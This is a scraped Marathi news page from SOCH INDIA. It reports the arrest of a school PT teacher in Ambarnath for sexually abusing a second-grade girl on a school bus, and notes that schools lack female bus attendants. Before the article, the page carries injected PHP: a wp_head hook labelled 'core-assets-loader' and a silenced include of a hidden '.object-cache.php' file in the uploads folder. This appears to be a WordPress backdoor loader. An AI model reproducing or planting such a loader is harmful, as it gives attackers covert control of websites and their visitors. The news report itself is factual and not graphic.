add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); शिक्षकानेच केला चिमुरडीवर अत्याचार – SOCH INDIA
Menu

देश
शिक्षकानेच केला चिमुरडीवर अत्याचार

nobanner

अंबरनाथ : येथील जांभूळफाटा परिसरात असलेल्या डेक्कन शाळेत शारीरिक शिक्षण (पीटी) देणार्‍या शिक्षकाने दुसरीत शिकणार्‍या चिमुरडीवर बसमध्ये लैंगिक अत्याचार केला. ही घटना २९ मार्च रोजी घडली असून, आरोपी शिक्षकाविरोधात गुरुवारी रात्री अंबरनाथ पोलीस ठाण्यात गुन्हा दाखल करून त्याला अटक केली आहे. त्याला १0 एप्रिलपर्यंत पोलीस कोठडी मिळाली आहे.
डेक्कन शाळेतील विद्यार्थ्यांना शाळेत घेऊन जाण्यासाठी आणि घरापर्यंत सोडण्यासाठी बसची सोय आहे. याच बसमधून पीडित चिमुरडीही प्रवास करत असे. या बसमध्ये शाळेचा पीटी शिक्षक सुरज रामसवत भारती (३२) हादेखील नेहमी जात असे. २९ मार्च रोजी विद्यार्थ्यांना घेऊन ही बस जात असताना सुरज याने या चिमुरडीला आपल्या शेजारी बसवून तिच्यावर लैंगिक अत्याचार केला. या मुलीला त्रास झाल्यावर तिने आपल्या आईला सांगितले. आईच्या फिर्यादीवरून विकृत शिक्षकाविरोधात अंबरनाथ पोलिसांनी गुन्हा दाखल केला.
बसमध्ये हा प्रकार घडल्याने शाळेची बस विद्यार्थ्यांसाठी घातक ठरत असल्याचे पुन्हा एकदा पुढे आले आहे. तीन महिन्यांपूर्वी बदलापूरच्या डॉन बॉस्को शाळेच्या बसमध्येही बसच्या क्लिनरने चिमुरडीवर अत्याचार केला होता. बसमध्ये महिला मदतनीस नेमण्याचे आदेश दिले असतानाही अनेक शाळांनी मदतनीस नेमलेले नाहीत. त्यामुळे बसमधून प्रवास करणार्‍या शाळकरी मुलींना त्याचा त्रास सहन करावा लागत आहे. अशा घटनांमुळे पालकवर्ग चिंतित आहे. (प्रतिनिधी)